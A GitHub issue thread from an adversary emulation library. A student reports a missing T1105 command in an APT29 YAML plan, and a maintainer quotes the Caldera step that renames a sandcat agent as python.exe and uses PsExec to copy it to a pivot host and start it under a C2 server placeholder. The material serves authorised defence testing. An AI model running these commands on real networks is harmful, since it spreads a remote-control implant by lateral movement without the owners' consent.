search

center-for-threat-informed-defense / adversary_emulation_library

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.
https://ctid.io/adversary-emulation
Apache License 2.0
1.68k stars 308 forks source link

Missing code in the APT29 yaml file #92

Open Guillaume-Muller opened 3 years ago

Guillaume-Muller commented 3 years ago

In the APT29 yaml file, at line 1749, command of T1105 is missing below the "executors" tag :

line 1746 executors: line 1747 - name: powershell line 1748 command: | line 1749 line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a

Thamane commented 3 years ago

Hello,

It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 :

platforms:
    windows:
      psh,pwsh:
        command: |
          move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
          set-location "C:\Program Files\SysinternalsSuite\";
          .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
          tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
        payloads:
        - sandcat.go-windows-upx
Guillaume-Muller commented 3 years ago

Thanks for your fast reply.

I'm currently a student and I'm trying to build a conversion scipt (like "ctid_aep_to_caldera.py") in order to use the yaml file with the Atomic framework. It is easier for me to directly copy the "executor" part because the Atomic yaml file is very similar (exemple below). By the way, don't you have that kind of script to convert to ATOMIC ?

Atomic YAML file : supported_platforms:

Le ven. 2 juil. 2021 à 11:21, Thamane @.***> a écrit :

Hello,

It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722 :

platforms: windows: psh,pwsh: command: | move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; set-location "C:\Program Files\SysinternalsSuite\"; .\PsExec64.exe -accepteula \#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; payloads:

  • sandcat.go-windows-upx

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues/92#issuecomment-872853848, or unsubscribe https://github.com/notifications/unsubscribe-auth/AUBC73OKTIGHOER5U6X3OU3TVWAKVANCNFSM47WIUHXA .

-- Cordialement.

Guillaume MULLER

Thamane commented 3 years ago

Sorry I do not have such a script at hand.

In your case just copying the command at 1722 and pasting it line 1749 will solve your problem. The executors yaml key is not parsed by caldera and is here probably for backward compatibility/cross compatibility for other framework like ATOMIC ? At least it is what is explained in this blog article :

The machine-readable Emulation Plan representation would be implemented in YAML. The YAML format would be as consistent as possible with accepted industry approaches to automated emulation. In the case of our YAML format, we started from the established Red Canary Atomic Red Team format but made some modifications to capture the threat intelligence that informs the emulation and to ensure a direct correlation between the human-readable and machine-readable versions of the Emulation Plan.